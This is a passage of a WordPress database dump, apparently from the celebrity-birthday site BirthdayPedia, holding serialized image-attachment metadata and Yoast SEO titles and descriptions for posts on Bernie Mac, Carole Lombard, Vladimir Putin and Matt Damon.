:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2006,330,'_wp_attached_file','2015/10/Bernie_Mac.jpg'),(2007,330,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:356;s:6:\"height\";i:599;s:4:\"file\";s:22:\"2015/10/Bernie_Mac.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-178x300.jpg\";s:5:\"width\";i:178;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Bernie_Mac-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Bernie_Mac-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x261.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x462.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x385.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x486.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-356x580.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Bernie_Mac-250x420.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2008,327,'_thumbnail_id','329'),(2009,327,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2010,327,'slide_template',''),(2011,327,'_yoast_wpseo_focuskw','Bernie Mac'),(2012,327,'_yoast_wpseo_title','Bernie Mac Birthday'),(2013,327,'_yoast_wpseo_metadesc','Bernie Mac is a famous comedian and actor. He rose from a poor childhood to stardom. Learn how this man inspired people and became a legendary comedian.'),(2014,327,'_yoast_wpseo_linkdex','97'),(2015,327,'post_views_count','224'),(2016,328,'_edit_last','6'),(2017,331,'_wp_attached_file','2015/10/Carole-Lombard.jpg'),(2018,331,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:864;s:6:\"height\";i:648;s:4:\"file\";s:26:\"2015/10/Carole-Lombard.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Carole-Lombard-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Carole-Lombard-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-864x580.jpg\";s:5:\"width\";i:864;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Carole-Lombard-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2019,332,'_wp_attached_file','2015/10/Carole_Lombard.jpg'),(2020,332,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:454;s:6:\"height\";i:599;s:4:\"file\";s:26:\"2015/10/Carole_Lombard.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-227x300.jpg\";s:5:\"width\";i:227;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Carole_Lombard-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Carole_Lombard-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-454x261.jpg\";s:5:\"width\";i:454;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-454x462.jpg\";s:5:\"width\";i:454;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-454x385.jpg\";s:5:\"width\";i:454;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-454x486.jpg\";s:5:\"width\";i:454;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-454x580.jpg\";s:5:\"width\";i:454;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Carole_Lombard-318x420.jpg\";s:5:\"width\";i:318;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2021,328,'_thumbnail_id','331'),(2022,328,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2023,328,'slide_template','default'),(2024,328,'_yoast_wpseo_focuskw','Carole Lombard'),(2025,328,'_yoast_wpseo_title','Carole Lombard Birthday'),(2026,328,'_yoast_wpseo_metadesc','Carole Lombard was a talented comedic actress who passed away long before her time. She still left her mark on the silver screen behind her.'),(2027,328,'_yoast_wpseo_linkdex','87'),(2028,328,'post_views_count','321'),(2031,327,'_wp_old_slug','bernie-mac'),(2033,20,'_yoast_wpseo_focuskw','BirthdayPedia'),(2034,20,'_yoast_wpseo_metadesc','Happy Birthday! Here at BirthdayPedia we are obsessed with birthdays. Check out our extensive list of celebrities\', athletes\' and musicians\' birthdays!'),(2035,20,'_yoast_wpseo_linkdex','7'),(2037,341,'_edit_lock','1444338618:6'),(2038,342,'_edit_lock','1444339003:6'),(2039,341,'_edit_last','6'),(2040,342,'_edit_last','6'),(2041,343,'_wp_attached_file','2015/10/Vladmir-Putin.jpg'),(2042,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:25:\"2015/10/Vladmir-Putin.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Vladmir-Putin-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Vladmir-Putin-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Vladmir-Putin-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Vladmir-Putin-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Vladmir-Putin-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2043,344,'_wp_attached_file','2015/10/Vladmir_Putin.jpg'),(2044,344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:468;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2015/10/Vladmir_Putin.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-234x300.jpg\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Vladmir_Putin-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Vladmir_Putin-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-468x261.jpg\";s:5:\"width\";i:468;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-468x462.jpg\";s:5:\"width\";i:468;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-468x385.jpg\";s:5:\"width\";i:468;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-468x486.jpg\";s:5:\"width\";i:468;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-468x580.jpg\";s:5:\"width\";i:468;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Vladmir_Putin-328x420.jpg\";s:5:\"width\";i:328;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2045,341,'_thumbnail_id','343'),(2046,341,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2047,341,'slide_template','default'),(2048,341,'_yoast_wpseo_focuskw','Vladimir Putin'),(2049,341,'_yoast_wpseo_title','Vladimir Putin\'s Birthday'),(2050,341,'_yoast_wpseo_metadesc','Born into a less than noble situation, Vladimir Putin is the current President of Russia, having attained that rank on May 7, 2012. Read more...'),(2051,341,'_yoast_wpseo_linkdex','91'),(2052,341,'post_views_count','184'),(2053,345,'_wp_attached_file','2015/10/Matt-Damon.jpg'),(2054,345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:651;s:4:\"file\";s:22:\"2015/10/Matt-Damon.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-768x488.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Matt-Damon-1024x651.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Matt-Damon-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Matt-Damon-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-696x442.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:23:\"Matt-Damon-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Matt-Damon-661x420.jpg\";s:5:\"width\";i:661;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2055,346,'_wp_attached_file','2015/10/Matt_Damon.jpg'